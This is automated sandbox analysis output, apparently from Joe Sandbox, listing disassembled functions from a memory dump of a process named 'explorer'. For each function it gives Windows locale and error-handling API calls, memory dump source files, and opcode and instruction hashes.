                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        • EnumSystemLocalesW.KERNEL32(007A1FDB,00000001,00000000,?,-00000050,?,007A2609,00000000,?,?,?,00000055,?), ref: 007A1F27
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: 8bec282c28d3337cfb0ddad5fab7edbb51946edc875178bbe9a25e71269c3a87
                                                                                                        • Instruction ID: ebc895907aee8cf595445ddd4883938621d80e9b4ac0b8be7dfad6b6aeab6749
                                                                                                        • Opcode Fuzzy Hash: 8bec282c28d3337cfb0ddad5fab7edbb51946edc875178bbe9a25e71269c3a87
                                                                                                        • Instruction Fuzzy Hash: 801129362047059FEB189F39C89557AB7A2FFC1358F54452CE9478B740D379A803C740
                                                                                                        Function 007A245A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,007A22D8,00000000,00000000,?), ref: 007A2486
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 3736152602-0
                                                                                                        • Opcode ID: ae85d7909fa0e9bc2ab364467fd97a1ebd78e1cb1d8f7a15cc0fb5fdc5636926
                                                                                                        • Instruction ID: c235b3976df318bf5a30b64b966f190596cfdfed179969e7ff9a2056a8467c93
                                                                                                        • Opcode Fuzzy Hash: ae85d7909fa0e9bc2ab364467fd97a1ebd78e1cb1d8f7a15cc0fb5fdc5636926
                                                                                                        • Instruction Fuzzy Hash: BCF0F932A00155AFDB289A6CC809BBB7754EB85754F044564EC05A7281DA7CFD02C6E0
                                                                                                        Function 007A1DC3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 00796882
                                                                                                          • Part of subcall function 00796820: _free.LIBCMT ref: 007968B8
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 007A1E17
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast_free$InfoLocale
                                                                                                        • String ID: <Y{$utf8
                                                                                                        • API String ID: 2003897158-1075160420
                                                                                                        • Opcode ID: c9aafe2bee966ac05452045858f16dd459276432a599d1a4a7ca68610388ce3b
                                                                                                        • Instruction ID: dbf6243b791e70ba3ad495a72cb17eceea27c45101b730a6a02351726dfa4b9a
                                                                                                        • Opcode Fuzzy Hash: c9aafe2bee966ac05452045858f16dd459276432a599d1a4a7ca68610388ce3b
                                                                                                        • Instruction Fuzzy Hash: 5BF0A432650109EBDB14AB78EC49EBA37ACDB49351F1442BDE902D7241EA7CAD058794
                                                                                                        Function 007A1F50 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        • EnumSystemLocalesW.KERNEL32(007A222E,00000001,FFFFFFFF,?,-00000050,?,007A25CD,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 007A1F9A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: 9e7233d460e42581b1913242d7ee62964e8c6687cad7d479f55e48e80ed49a94
                                                                                                        • Instruction ID: c0044872425fc7e91358419cec071e9859258f790ccc1cb0b699adbcef48c2bf
                                                                                                        • Opcode Fuzzy Hash: 9e7233d460e42581b1913242d7ee62964e8c6687cad7d479f55e48e80ed49a94
                                                                                                        • Instruction Fuzzy Hash: 52F0F6366013445FEB245F79AC85A7A7B95FFC1368F09862DF9054B680C779AC02D750
                                                                                                        Function 00797F0C Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00792100: EnterCriticalSection.KERNEL32(-00047B11,?,00793427,00000000,007C3028,0000000C,007933EE,?,?,0079A24D,?,?,007969C2,00000001,00000364,00000006), ref: 0079210F
                                                                                                        • EnumSystemLocalesW.KERNEL32(00797EFF,00000001,007C3248,0000000C,0079832A,00000000), ref: 00797F44
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1272433827-0
                                                                                                        • Opcode ID: 036fee09e35bbc7f9b2330aef8f600e0c621df3e584108127050d075fc873e12
                                                                                                        • Instruction ID: f845e6d682d776458ba12876633cde9dbe3b13f2b5a28c97d7d3f384da1b07f0
                                                                                                        • Opcode Fuzzy Hash: 036fee09e35bbc7f9b2330aef8f600e0c621df3e584108127050d075fc873e12
                                                                                                        • Instruction Fuzzy Hash: 44F0F972A54218EFDB04EF98E846F9D77F0EB48721F10815AF410AB2A1DBBD5941CF46
                                                                                                        Function 007A1E6A Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00796820: GetLastError.KERNEL32(00000000,00000000,?,00797607,?,00000000,00000000,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010), ref: 00796825
                                                                                                          • Part of subcall function 00796820: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00797AC1,00000000,00000000,00000000,00000000,8B18EC83,007C3208,00000010,00790B22,00000000,00000000,00000000), ref: 007968C3
                                                                                                        • EnumSystemLocalesW.KERNEL32(007A1DC3,00000001,FFFFFFFF,?,?,007A262B,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 007A1EA1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2417226690-0
                                                                                                        • Opcode ID: d97dd638c6f6aef1c5709c60a8650be22d8114d50400c04d0d9449984d7b3744
                                                                                                        • Instruction ID: 9164ca26813770768bee8518fa2e1670b867779ffc1955e04f77ba3f8cce217f
                                                                                                        • Opcode Fuzzy Hash: d97dd638c6f6aef1c5709c60a8650be22d8114d50400c04d0d9449984d7b3744
                                                                                                        • Instruction Fuzzy Hash: 71F0AB3A30020857DB049F39E809B6B7F94EFC27A1F464158EE058B240C679D842C7D0
                                                                                                        Function 0079842E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00795784,?,20001004,00000000,00000002,?,?,00794D91), ref: 00798462
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 0ad47061207436b01a9737c2898f032f3a056584f49b922a282827cc2e8bb19c
                                                                                                        • Instruction ID: 25b9836f6b47df695f4ee15f7b43af02ec14f4f5e1c66176c641b49af982d793
                                                                                                        • Opcode Fuzzy Hash: 0ad47061207436b01a9737c2898f032f3a056584f49b922a282827cc2e8bb19c
                                                                                                        • Instruction Fuzzy Hash: 5DE04F3254021CBBCF122F64EC08EAE7F15EF45761F008510FD0566261CF398920AAE6
                                                                                                        Function 007D80EA Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: z
                                                                                                        • API String ID: 0-1657960367
                                                                                                        • Opcode ID: 4c083d682b8d6a821b7a272f76fb90df478801e172e5b40452a19925f7606558
                                                                                                        • Instruction ID: 586fd52a5f2336967c3a6d0fe10d5b45d4834231e0d9b6966418821e008dc927
                                                                                                        • Opcode Fuzzy Hash: 4c083d682b8d6a821b7a272f76fb90df478801e172e5b40452a19925f7606558
                                                                                                        • Instruction Fuzzy Hash: F051E670B01729DBDF94AFE48CD86AEB6B5AF48300F1005AEE509D7311DE789D498B81
                                                                                                        Function 00765450 Relevance: .7, Instructions: 701COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c248ef47a0ae500ba22a05f4c36954a30670ec2be6e79b0cc36b296fff902298
                                                                                                        • Instruction ID: cb89fb46aaebc4cfbacebbebeb476058102050ed6e1ce1a54bb97a3f3600a3c7
                                                                                                        • Opcode Fuzzy Hash: c248ef47a0ae500ba22a05f4c36954a30670ec2be6e79b0cc36b296fff902298
                                                                                                        • Instruction Fuzzy Hash: 68224FB3F515145BDB0CCA5DDCA27EDB3E3AFD8218B0E803DA40AE3345EA79D9158648
                                                                                                        Function 0079CC09 Relevance: .6, Instructions: 637COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ebc160c4fe94ffb9e23890b96cafdd61019fb64869369ba1857a6f8c83f4dfcf
                                                                                                        • Instruction ID: 5f8d11a978df18178cc9efc17417896da4dc877c2b344046ebec38fe7ca9a198
                                                                                                        • Opcode Fuzzy Hash: ebc160c4fe94ffb9e23890b96cafdd61019fb64869369ba1857a6f8c83f4dfcf
                                                                                                        • Instruction Fuzzy Hash: A6321662D29F414DDB339638E832336A648AFB73C5F15D727F819B59A6EB2CC8834101
                                                                                                        Function 007A1679 Relevance: .3, Instructions: 327COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 4283097504-0
                                                                                                        • Opcode ID: f304543061a74a604e2e7f5a8fa2c2c52bbe04bf861166e073d64f28799fdfd5
                                                                                                        • Instruction ID: 61537830ad3103184e61870dbd480e418f7ab9d1d076d35e7d222c3da186314b
                                                                                                        • Opcode Fuzzy Hash: f304543061a74a604e2e7f5a8fa2c2c52bbe04bf861166e073d64f28799fdfd5
                                                                                                        • Instruction Fuzzy Hash: E2B1FA755007458BEB389F24CC96AB7B3E9EF86304F94462DE983C6580EA7DF985C710
                                                                                                        Function 0078F3EB Relevance: .2, Instructions: 216COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 54fe28e80fb72b583481cea6b7f81cf34f8de984378f0d41b8157c74fa951865
                                                                                                        • Instruction ID: 1a3558871a915df1527fc5452ae4e15f11f3b05e21613ff64021842745878cf0
                                                                                                        • Opcode Fuzzy Hash: 54fe28e80fb72b583481cea6b7f81cf34f8de984378f0d41b8157c74fa951865
                                                                                                        • Instruction Fuzzy Hash: 8C51AB716C06C897DF38BE2C8499BBF679A9F12304F64403FE44AD7292D61DDD4A8362
                                                                                                        Function 007A5B96 Relevance: .1, Instructions: 104COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0db64de4106bfa3d32beaccf9859501c64a730206fbe7bfabf6dead1b9e96004
                                                                                                        • Instruction ID: 43805f5d991cb834cac70762ab11cfc0e0ce384b40bb5eec7ed1c7affe508ff9
                                                                                                        • Opcode Fuzzy Hash: 0db64de4106bfa3d32beaccf9859501c64a730206fbe7bfabf6dead1b9e96004
                                                                                                        • Instruction Fuzzy Hash: 5121B673F209394B770CC47E8C5627DB6E1C68C511745823EE8A6EA2C1D96CD917E2E4
                                                                                                        Function 007A5A76 Relevance: .1, Instructions: 81COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9302e13d906365bb2a3d3a17de13bc564f27e69ebc70b68780de2410028c5a91
                                                                                                        • Instruction ID: 952f945c7ad4b2241be7ac682878425ff5e40be0d02a8491e73ad2884437073d
                                                                                                        • Opcode Fuzzy Hash: 9302e13d906365bb2a3d3a17de13bc564f27e69ebc70b68780de2410028c5a91
                                                                                                        • Instruction Fuzzy Hash: 8C118A23F30C355B675C816D8C1727A95D2DBD825075F533ED827E7284E9A4DE13D290
                                                                                                        Function 0078B4B0 Relevance: .1, Instructions: 76COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction ID: c5a75eff3c480d017f2f6df32499307c079876ef148d61832a8fea3eff909151
                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction Fuzzy Hash: 4B113DB72C048243D614E63DD4F46B7A795EBC5321B3C437AD0468B759E32AE9659B00
                                                                                                        Function 00792473 Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 357COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free$Info
                                                                                                        • String ID: `-{$.{
                                                                                                        • API String ID: 2509303402-1149821797
                                                                                                        • Opcode ID: 2a61fbc7daf029e06c7ddb84f52f7adbdc2fabee0b01128fe6e99c74622d5d60
                                                                                                        • Instruction ID: 375856a04aa928c149ede3e5d5e18237455f0c22c33ba052f2dd38148a98629a
                                                                                                        • Opcode Fuzzy Hash: 2a61fbc7daf029e06c7ddb84f52f7adbdc2fabee0b01128fe6e99c74622d5d60
